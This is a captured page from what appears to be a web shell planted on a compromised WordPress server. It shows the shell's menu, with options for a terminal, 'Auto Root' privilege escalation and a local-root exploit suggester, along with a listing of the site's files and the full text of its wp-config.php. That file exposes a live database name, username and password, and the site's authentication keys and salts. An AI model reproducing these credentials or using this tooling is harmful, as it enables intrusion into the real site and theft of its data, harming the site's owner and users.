Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.217.62
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
bigpuxtb /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-03-26 19:57
8bb8f
[ DIR ]
dr-xr-xr-x
2026-03-23 08:06
wp-admin
[ DIR ]
drwxr-xr-x
2026-03-26 19:46
wp-content
[ DIR ]
drwxr-xr-x
2026-03-26 19:46
wp-includes
[ DIR ]
drwxr-xr-x
2026-03-26 19:46
.htaccess
1.4
KB
-rw-r--r--
2026-05-15 10:20
goods.php
1.46
KB
-rw-------
2024-05-23 08:06
index.php
24.88
KB
-rw-------
2023-09-27 08:07
index.php0
24.88
KB
-rwxr-xr-x
2024-01-10 08:07
plugins.php
1.29
KB
-rw-------
2024-05-01 08:05
robots.txt
396
B
-r--r--r--
2023-09-13 08:07
wp-activate.php
7.21
KB
-rw-------
2026-01-08 12:13
wp-config.php
4.13
KB
-rw-------
2026-01-08 12:13
Save
Rename
<?php // BEGIN iThemes Security - Не меняйте и не удаляйте эту строку // iThemes Security Config Details: 2 define( 'DISALLOW_FILE_EDIT', true ); // Отключить редактор файлов - Безопасность > Настройки > Подстройки WordPress > Редактор файлов // END iThemes Security - Не меняйте и не удаляйте эту строку define( 'ITSEC_ENCRYPTION_KEY', 'dUFmdlJxNmp1d2UrWEkgQnw2T0Y+WUBJRWszRUV2JSRSZDUhSjllKHsrU2sjamVvPFY8ZU9gK04rPDZ2QEEpMw==' ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ //define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] ); //define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] ); // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('FORCE_SSL_ADMIN', true); define( 'DB_NAME', 'ilham1um_fonda31' ); /** Database username */ define( 'DB_USER', 'ilham1um_fonda31' ); /** Database password */ define( 'DB_PASSWORD', 'JIQiajV6' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'i9!>aQKr:(@2a,}xsC|rBq0g:7o n,i`oVjoP(I2.fhT-P8?Lb#dv}bh?p=J{ee8' ); define( 'SECURE_AUTH_KEY', 'nBfvLkPNLxb,^DtF4O=_`=U=a>tk>]Np@E=mxI7=WltPe-@KhKaAhl`BN0;R|}d.' ); define( 'LOGGED_IN_KEY', 'P18bn%cq]6e(C)k-ZT-Ep?VetjZyTD64{K?%AzJJD#}LVgi%L G$uHxMO,+[?VpI' ); define( 'NONCE_KEY', '~RTq)_T=_Shke{}WY;mU>E,u&azFpS|*V:agU$[&)H9k?woj~=h/#2n)4+$2e.`P' ); define( 'AUTH_SALT', 'qve=TWElfUYRgkM9+b> sh>R%r0OqZgUNpU2l^dpr~.b^bBspJ6{IR=DA5G,m *z' ); define( 'SECURE_AUTH_SALT', '12U:7c|z&Rsqr$?|LQPk@-bU{P&DC8pdkE+72Rkoj!2y/%Do;@diF, >mMsmaAid' ); define( 'LOGGED_IN_SALT', 'y#WYcp>Xd^ &98uY[,g8}c{I?5=>fo5I67Jt<?[[}<`1L<hd=Phm&qNgCm5X$:>H' ); define( 'NONCE_SALT', 'iNni4y`ZF&ZO)#8z,BqkNq=k2fM|3$DFgy+c#>{K9L6ib{u<0#)++Z-2V90(+5Rn' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';